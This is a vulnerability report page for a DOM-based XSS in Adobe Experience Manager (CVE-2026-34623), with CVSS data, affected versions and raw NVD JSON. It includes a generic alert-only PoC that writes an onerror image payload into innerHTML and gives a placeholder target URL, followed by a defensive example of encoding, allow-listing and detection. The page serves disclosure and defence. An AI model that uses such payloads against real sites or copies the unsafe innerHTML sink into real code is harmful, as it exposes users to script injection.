Security Vulnerability Report
CVE-2026-34623 CVSS 5.4 MEDIUM

Published: 2026-04-14 19:16:38
Last Modified: 2026-04-15 19:41:53

Description

Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a specially crafted web page.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE (versionEndIncluding 6.5.24.0)
cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:* - VULNERABLE (versionEndExcluding 6.5.11.8)
Adobe Experience Manager <= 6.5.24.0
Adobe Experience Manager Screens < 6.5.11.8 (the NVD range for the "FP11.7 and earlier" wording in the description; the vendor advisory referenced below is the AEM Screens bulletin)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
/*
 * PoC for CVE-2026-34623 (DOM-based XSS in Adobe Experience Manager)
 * Description: Demonstrates how a malicious payload in the URL hash
 * could be executed if the application uses innerHTML unsafely.
 * Note: this is a generic simulation of the sink class (untrusted
 * data assigned to innerHTML); the specific AEM source and sink are
 * not identified on this page.
 */

// Simulate the vulnerable scenario where user input from the URL is reflected unsafely.
function simulateVulnerability() {
  // In a real attack, this comes from document.location.hash.
  var maliciousPayload = "<img src=x onerror=alert('CVE-2026-34623 - DOM XSS Executed')>";
  console.log("Executing PoC for CVE-2026-34623...");
  // Vulnerable sink: innerHTML assigned untrusted data without encoding.
  // This mimics the behaviour attributed to the vulnerable AEM version.
  document.body.innerHTML = "Welcome to AEM: " + maliciousPayload;
}

// To test: visit https://target-aem-site.com/vulnerable_page.html#<img src=x onerror=alert(1)>
// (placeholder host and page; run this in a browser, not Node, since it needs document)
simulateVulnerability();
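The PoC above only shows the vulnerable half of the pattern. The following is an added example, not code from this page or from Adobe: the same untrusted-fragment-into-innerHTML flow written as pure string functions (so it runs in Node without a DOM), beside two hardened renderings and a small oracle that tells them apart. The "Welcome to AEM" page, the sample fragments and every function name are this example's own assumptions; the real AEM source and sink for CVE-2026-34623 are not published on this page.

```javascript
// Constructed sample fragments: what location.hash.slice(1) would hand the page.
const SAMPLE_FRAGMENTS = {
  benign: "welcome-section",
  rawTag: "<img src=x onerror=alert('CVE-2026-34623 - DOM XSS Executed')>",
  // Browsers percent-decode little of the fragment; the page often does it itself.
  urlEncoded: "%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E",
};

// Decode defensively: a stray "%" makes decodeURIComponent throw, which must not
// turn into an unhandled exception in the page.
function decodeFragment(fragment) {
  try {
    return decodeURIComponent(fragment);
  } catch (e) {
    return "";
  }
}

// Vulnerable sink: the fragment becomes part of a markup string destined for
// element.innerHTML. The HTML parser runs on it, so any tag or handler is live.
function renderVulnerable(fragment) {
  return "Welcome to AEM: " + decodeFragment(fragment);
}

// Hardening 1: encode for the HTML text context before concatenating.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderEncoded(fragment) {
  return "Welcome to AEM: " + escapeHtml(decodeFragment(fragment));
}

// Hardening 2: the fragment is supposed to be an identifier, so allow-list its
// shape and drop anything else instead of rendering it. Rejections are returned
// so the caller can log them; a burst of rejected fragments is itself a signal.
const FRAGMENT_ALLOWED = /^[A-Za-z0-9_-]{1,64}$/;
function renderAllowListed(fragment) {
  const value = decodeFragment(fragment);
  if (!FRAGMENT_ALLOWED.test(value)) {
    return { html: "Welcome to AEM", rejected: true };
  }
  return { html: "Welcome to AEM: " + value, rejected: false };
}

// Crude stand-in for the browser's parser: does the markup contain a <script>
// element or a tag with an inline on* event-handler attribute? Good enough to
// show the difference between the renderings above; not a general XSS detector.
function containsActiveMarkup(html) {
  return /<\s*script\b/i.test(html) || /<[^>]*\son[a-z]+\s*=/i.test(html);
}

// Compare the three renderings over every sample fragment.
function compareRenderings() {
  const rows = [];
  for (const [name, fragment] of Object.entries(SAMPLE_FRAGMENTS)) {
    rows.push({
      fragment: name,
      vulnerableActive: containsActiveMarkup(renderVulnerable(fragment)),
      encodedActive: containsActiveMarkup(renderEncoded(fragment)),
      allowListRejected: renderAllowListed(fragment).rejected,
    });
  }
  return rows;
}

console.table(compareRenderings());
```

The durable fix is to stop routing this value through the HTML parser at all (assign it with `textContent`, or build the element with DOM APIs), which is what the encoded rendering approximates when the string really does have to go through innerHTML; the allow-list variant is the stricter option when the fragment has a known shape, as a section anchor does.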

References

https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34623", "sourceIdentifier": "[email protected]", "published": "2026-04-14T19:16:37.903", "lastModified": "2026-04-15T19:41:53.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a specially crafted web page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndIncluding": "6.5.24.0", "matchCriteriaId": "5898EACB-FA50-4AED-9248-9D4FBFD558D9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.11.8", "matchCriteriaId": "CE7B652E-C71C-42E0-950D-59CABCE683CE"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}